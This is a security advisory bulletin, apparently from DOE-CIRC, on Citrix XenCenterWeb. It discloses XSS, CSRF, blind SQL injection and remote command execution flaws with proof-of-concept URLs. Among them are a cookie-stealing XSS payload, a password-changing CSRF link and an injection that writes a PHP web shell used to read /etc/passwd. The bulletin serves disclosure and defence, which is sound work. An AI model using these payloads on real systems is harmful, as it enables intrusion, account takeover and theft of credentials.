TECHNICAL BULLETIN
TECHNICAL BULLETIN
| PROBLEM: | Citrix XenCenterWeb is vulnerable to cross site scripting, SQL injection and remote command execution vulnerabilities. |
| PLATFORM: | Citrix XenCenterWeb 0 |
| ABSTRACT: | Due to poor validation of some user controlled inputs, a variety of attacks against the application and the underlying server are possible. Cross-site scripting, cross-site request forgery, SQL injection and remote command execution attack vectors were identified. |
| LINKS: | |
| DOE-CIRC BULLETIN: | http://www.doecirc.energy.gov/bulletins/t-180.shtml |
| OTHER LINKS: |
SecurityFocus http://www.securityfocus.com/bid/35592/info Security Tracker http://securitytracker.com/alerts/2009/Jul/1022520.html Juniper Networks http://www.juniper.net/security/auto/vulnerabilities/vuln35592.html |
| IMPACT ASSESSMENT: | This risk is high. Exploiting these issues could allow an attacker to execute arbitrary code, perform unauthorized actions, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. |
Discussion:
Citrix XenCenterWeb is a web interface for Citrix XenServer environment management. Users of XenCenterWeb will be able to see a list of Virtual Machines in the Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.), get basic information about the hosts in the Resource Pools, information about the VMs and also connect to the console of the VMs. Due to poor validation of some user controlled inputs, a variety of attacks against the application and the underlying server are possible. Cross-site scripting, cross-site request forgery, SQL injection and remote command execution attack vectors were identified as well.XSS and CSRF attacks can be performed on the virtual appliance itself, while the others require the PHP parameter magic_quotes_gpc to be off on the web server.
Vulnerability Details:
(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF)
With the default PHP configuration (register_globals=Off and magic_quotes_gpc=On), both XSS and CSRF attacks can be executed. The first XSS attack exploits the lack of sanitization in the username parameter in edituser.php script and requires the victim to be able to access configuration scripts:
https://xencenterweb.loc/config/edituser.php?username=1(script)alert(document.cookie)(/script)Under the same conditions, a CSRF attack can be executed to change the password of an arbitrary user:
https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd]
Another CSRF attack can hard stop a VM of the attacker's choice:
https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname]Other XSS vulnerabilities afflict scripts which are accessible by anyone:
https://xencenterweb.loc/console.php?location=1">(script)alert(document.cookie)(/script)
<"&vmname=myVMhttps://xencenterweb.loc/console.php?location=1&sessionid=1">(script)alert(123)(/script
)<"&vmname=myVMhttps://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM(script)aler
t(123)(/script)https://xencenterweb.loc/forcerestart.php?vmrefid=1">(script)alert(123)(/script
)<"&vmname=myVMhttps://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM">(script)alert(123)(
/script)<"https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM">(script)alert(123)(
/script)<"https://xencenterweb.loc/forcesd.php?vmrefid=1">(script)alert(123)(/script)<"&vmname=myVM
(b) SQL Injection
The username parameter in the login.php script is vulnerable to a Blind SQL Injection attack.An attacker can retrieve the whole database schema through specially crafted requests. Here is an example proof of concept:
https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE 'root@%', benchmark(1000000,sha1('test')), 'false')/*Obviously, other high profile attacks can be performed through this attack vector.
(c) Remote Command Execution
An attacker could write arbitrary data in the file /usr/local/lib/php/include/config.ini.phpthrough the file /var/www/config/writeconfig.php. Due to this unsecure behavior, arbitrary commands can be executed on the machine.If a victim with the proper authorization follows this link:
https://xencenterweb.loc/config/writeconfig.php?pool1='; (?php $cmd = $_REQUEST['cmd']; passthru($cmd); ?) (?php $xen = '
or this URL encoded version:
https://xencenterweb.loc/config/writeconfig.php?pool1=%27%3B%20%3F%3E%20%3C%3Fphp%20%24cmd%20%3D%20%24_REQUEST%5B
%27cmd%27%5D%3B%20passthru%28%24cmd%29%3B%20%3F%3E%20%3C%3Fphp%20%24xen%20%3D%20%27
an attacker can then simply execute commands on the system through the console.php file:https://xencenterweb.loc/console.php?cmd=cat%20/etc/passwd;
*** EXPLOIT ***
Attackers may exploit these issues through a common browser as explained above.
Solution:
No patch is currently provided by Citrix, and the application download has been removed. Citrix officially stated that "the tool was created to demonstrate how the SDK could be used to create unique solutions. Customers currently using it should assess the risks of continued use in light of your findings and, if these prove to be unacceptable, discontinue usage".
*** WORKAROUNDS ***
Common web application workarounds apply, like virtual patching from a web application firewall or similar solutions. However most of the reported issues can be mitigated by running the application only inside the virtual appliance or in properly configured web servers.
Voice: 866-941-2472
E-mail: doecirc@doecirc.energy.gov
World Wide Web: http://www.doecirc.energy.gov